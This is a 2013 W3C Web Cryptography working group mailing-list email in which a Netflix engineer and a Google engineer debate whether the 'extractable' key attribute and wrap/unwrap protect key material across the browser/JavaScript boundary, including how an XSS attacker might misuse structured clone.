- From: Mark Watson <watsonm@netflix.com>
- Date: Mon, 6 May 2013 10:25:26 -0700
- To: Ryan Sleevi <sleevi@google.com>
- Cc: "public-webcrypto@w3.org" <public-webcrypto@w3.org>
- Message-ID: <CAEnTvdBnmmwEd_MH-0N3Z2WHMV=Nb14_y8WWjSjDK1yBOjssaw@mail.gmail.com>
On Mon, May 6, 2013 at 9:46 AM, Ryan Sleevi <sleevi@google.com> wrote: > On Mon, May 6, 2013 at 8:46 AM, Mark Watson <watsonm@netflix.com> wrote: > > Sent from my iPhone > > > > On Apr 29, 2013, at 5:24 PM, Ryan Sleevi <sleevi@google.com> wrote: > > > >> On Sat, Apr 27, 2013 at 6:40 AM, Mark Watson <watsonm@netflix.com> > wrote: > >>> > >>> > >>> > >>> On Fri, Apr 26, 2013 at 6:01 PM, Ryan Sleevi <sleevi@google.com> > wrote: > >> <snip> > >>>> Is this a good summary of our disagreement? > >>> > >>> > >>> Let's discuss on our next call, after I get back. > >>> > >>> I believe the above is roughly correct about the point of > disagreement, but to fully understand your position I need to understand > how the extractable flag fits into your view of the situation ? How is that > valuable if there is no boundary at all between JS and UA for the purposes > of this API ? > >> > >> Right, and this represents my general unease with 'extractable' at all > >> - in what situation DOES it make sense? > >> > >> It feels very meaningless today already, in the presence of structured > >> clone + inter-origin postMessage. In such a scenario, you don't even > >> have to worry about extractability - an XSS attacker can just clone > >> the object into their own attacker controlled origin, which they can > >> then use to potentially spoof messages from a UA. > > > > Ok, so I don't see how you draw a line between extractable and > > wrap/unwrap then. If one is meaningless, so is the other and vice > > versa. > > > > If the group agrees with your position, I think we must remove the > > extractable attribute. > > > >> > >>> I agree that there are situations where the UA/JS boundary is > unimportant and situations where it is significant but I don't agree that > the difference is tied fundamentally to the presence or absence of > pre-provisioned keys. Of course pre-provisioned keys make a big difference, > but from a practical security engineering standpoint the JS and the UA are > different in all cases. They are subject to different attacks. They have > different security properties. If we make a fundamental assumption that > they are the same (for this API), we are pre-judging the security engineers > who will actually use this API. That's not our job. Unless we have a > mathematical reason to believe that there is no boundary of interest here > the people who will decide whether it matters to their application are the > engineers using the API. > >>> > >>> ...Mark > >>> > >>> PS: I didn't answer your other points above only because I am going on > vacation. I'll get back to you on those. > >> > >> Naturally, I disagree with this :-) > >> > >> I think it's important to model our API after the existing separations > >> that exist in the web platform - that is, at the origin level. I > >> realize that for sysapps/"extensions", there may be a greater > >> opportunity to model boundaries, but I think any attempts to try to > >> treat the boundary between UA and JS executing is, in many ways, > >> doomed to failure. You'll recall this is one of the many criticisms > >> pointed out by the "web crypto haters" - and rightfully so, as > >> attempts to somehow redefine that boundary "securely", but in > >> isolation of this API alone, are exercises in hubris. > >> > >> Rather than discussing specific API proposals, I almost think this > >> should be an exercise for the WG to reach consensus by modelling > >> attack scenarios (ideally, those against use cases reflected in our > >> use cases document) and reaching consensus as to which attacks are and > >> are not in scope. If we're in agreement that attacks X, Y, and Z are > >> all in scope, and are unaddressed by the API, then we have a > >> reasonable point for discussions on mitigation - whether it be changes > >> in how structured clone behaves, in how export behaves, or in how > >> wrap/unwrap SHOULD work. > >> > >> This gets to the core of our disagreement - whether and how much XSS > >> (persistent or reflective) should be in scope for the threat model, > >> when they're already so far out of scope for every API today > >> (including those that require permissions - such as video, > >> geolocation, etc). > >> > >> If you'll notice, the position I'm arguing for is that, as far as > >> normative requirements go, we should provide the LEAST amount of > >> guarantees, unless it can be demonstrated that we need to provide > >> more. I interpret (and perhaps incorrectly) your response as > >> suggesting we should try to include MORE guarantees, because "why not" > >> or "someone might need them" - positions as an implementer that > >> naturally give me great pause, even when there is at least one use > >> case requesting them. > > > > No, I am not suggestion normative guarantees other than > > straightforward requirements on the functionality of the API: a key > > object with extractable = false cannot be used with 'exportKey' or > > 'wrapKey' methods (the API must throw an error if you try), a key > > object with usage 'encrypt' cannot be used with sign or verify etc. > > > > Perhaps, if we are paranoid, we should specify that UAs must not > > provide other JS APIs that circumvent these requirements. > > You mean like the "Structured Clone"? > Structured Clone doesn't change the properties of the Key object (in fact by definition it keeps them the same), so that wouldn't provide a way to export or wrap a non-extractable key, or use a key for a usage different from those specified in the Key properties. Unless I have very badly mis-understood structured clone. What I mean is that a UA must not provide additional methods that don't respect the Key attributes. For example if a UA provided an exportKeySpecial() method that just ignored the extractable attribute. > > It's easy to put forward straightforward requirements like you have - > but if they aren't consistent with the threat they claim to be > preventing, what's their value? > > It's a simple argument: If "extractable = false" is meant to prevent > key material from leaking past the origin/UA boundary It's meant to prevent key material from leaking from the UA to the JS. Cross-origin leakage of information is a separate issue. > , than having > "Structured Clone" for Key objects handily defeats that - an XSS to a > site can export the Key object via postMessage to an origin under the > attackers control, from which they've now elevated it into a > "persistent signing oracle". > As I said, cross-origin leakage of information is a separate issue. Having access to the Key object is also different from having access to the secret material in the Key: if you have the Key object then yes, you have an oracle that can use that key for it's allowed usages and you could expose that as a service, but only to the network the device is connected to, for as long as the device is connected and your JS is loaded, subject to the policies and restrictions of any NAT it is behind, within the capacity of that device and its network connection. If you have the secret material you can send that to a server of your choice which can use it without any of those restrictions. It's very different. > > If THAT is not your threat model, then please be clear about what is. > > You can't simply say "The JS is outside the boundary," but then have > the entire API driven by the JS, without actually exploring what it is > you're trying to protect. > > Is it the key material [as you have suggested]? > Yes, it's the key material. > Is it the act of signing [as Mountie, Karen, and Nick have suggested]? > Is it something else, gated on some other capability? > > > > > My point is that the security significance of the boundary between UA > > and JS - the boundary across which our API calls are made - is an > > application-specific security engineering question. Given a reasonable > > use-case, we can reasonably include support for features which are > > meaningful only when this boundary has some security significance > > (such as extractable and wrap/unwrap). > > > > You accept that given pre-provisioned keys the boundary is > > significant. There are other ways (outside the scope of this > > specification) that an application may gain some kind of confidence in > > the UA - to a greater or lesser extent. None of this is > > black-and-white, especially when the risk is low. For example, > > theft-of-service is something we care about at Netflix, but theft of a > > $7.99 service is not the same as forging of a $7.99M Internet banking > > transaction. > > > > You are free to argue that our use-case is unreasonable, though I am > > not sure to what extent it is the role of this group to subject > > use-cases to detailed security analysis. We know that this API can be > > used to build stuff that is not secure - we're not designing something > > that guarantees the security of all applications which use it - but of > > course we should not provide primitives that can never be secure. It > > sounds like this is your position on extractable/wrap/unwrap for all > > values of 'secure' absent pre-provisioned keys. This is where we > > disagree. > > We're in the security area - every use case MUST be subject to > detailed security analysis to figure out what exactly makes sense, and > what the threats are and what the guarantees are - especially when > designing a generic API that will be used by a variety of > applications. > > Because of this generalization, it's vitally important to be very > clear about what guarantees are made, what the threats are, and what > the mitigations are. You seem to be arguing that this particular API > should do something to try to mitigate a particular set of threats. > It's entirely reasonable to question whether or not those mitigations > can or should be provided elsewhere / through other APIs, and to > question the validity of the threats in a holistic sense to see > whether or not it makes sense for them to be dealt with per-API. > > We have a dedicated WG for dealing with these issues, so let's not put > the cart before the horse when designing the API. > > To put it differently, much like the use cases presented at the F2F > for Korean Banking, I'm trying to distill what are the core > requirements of this particular use case, and where the web platform > falls short, so that we can look at actually addressing the root > needs, rather than provide a particular, implementation-specific API. > In this case I think it comes down to a rather simple question: do we think there is value in avoiding leakage of secret key information from UA to JS ? It seems to be accepted that in that case of a security model with strong service trust in the UA - for example using pre-provisioned keys - then there is value in this. The remaining question is whether there is value in other cases, without pre-provisioned keys, specifically. My point is that there are many other ways to establish (potentially weaker) security models where the UA and JS are not equally trusted by the service. And it's obvious that the UA and JS are not equally trusted by the user. This seems to be ample justification for introducing functions common in other crypto APIs - such as PKCS11 - that control transfer of keying material across the API boundary. The extractable attribute is the simplest and wrap/unwrap are essentially extensions of that concept to key delivery. We're providing a toolkit - it is not necessary to examine the structural integrity of my design for a chair to conclude that it would be useful to have a hammer. Having said that, the analysis for our use-case it not that hard. First, we would like to establish keys that will be used for ongoing secure communication between the client and our servers. A number of attacks against our service are possible if someone obtains these keys (you will just have to accept this, but it should be obvious merely from the fact we choose to use cryptography here at all), so the objective is that only the User to whom the keys were issued (and their Agent) should have access to the keying material. We believe that our client JS may be subject to attacks in ways that the UA code is not. We consider an attack that gives access to an oracle, tied to a particular UA, is much less problematic than an attack which gives access to the keys themselves (for some of the reasons explained above). Finally, we understand that hiding of these keys from the JS may sometimes only be possible in a TOFU fashion as outlined in my other mail, and we still believe this is useful. You may ask, what attacks, exactly, is the JS subject to that the UA is not ? I could enumerate some, but there is a sufficient difference between the JS and the UA to be concerned about things we have not yet thought of. Basically, we consider it much more likely that dynamically downloaded, interpreted source code may be subject to malicious modification than pre-compiled installed binaries. The entire web security model is predicated on the assumption that the user should trust their Agent more than they trust web sites. If the user is justified in making this distinction, so are we. ...Mark > > > > Let's discuss it on the call. > > > > ...Mark >
Received on Monday, 6 May 2013 17:25:59 UTC